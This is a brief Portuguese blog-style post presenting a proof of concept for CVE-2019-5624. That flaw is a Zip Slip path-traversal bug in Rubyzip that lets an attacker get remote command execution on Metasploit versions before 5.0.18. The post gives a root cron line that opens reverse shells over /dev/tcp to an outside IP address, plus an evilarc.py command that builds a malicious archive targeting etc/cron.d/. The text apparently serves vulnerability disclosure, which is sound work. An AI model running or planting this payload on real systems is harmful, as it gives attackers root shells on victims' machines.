
Uma prova de conceito para a vulnerabilidade CVE-2019-5624 do Metasploit (RCE por manipulação insegura de ZIP no Rubyzip)
Uma prova de conceito para a vulnerabilidade CVE-2019-5624 do Metasploit (RCE por manipulação insegura de ZIP no Rubyzip)
Em fevereiro de 2019, encontrei uma nova vulnerabilidade na biblioteca Rubyzip. Ela permite que um invasor explore a manipulação insegura de ZIP (Zip Slip), resultando em execução remota de comandos.
Essa vulnerabilidade foi aproveitada para atingir todas as versões do Metasploit < 5.0.18 Metasploit Wrap-Up
Escrevi este post detalhado no blog explicando a vulnerabilidade.
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/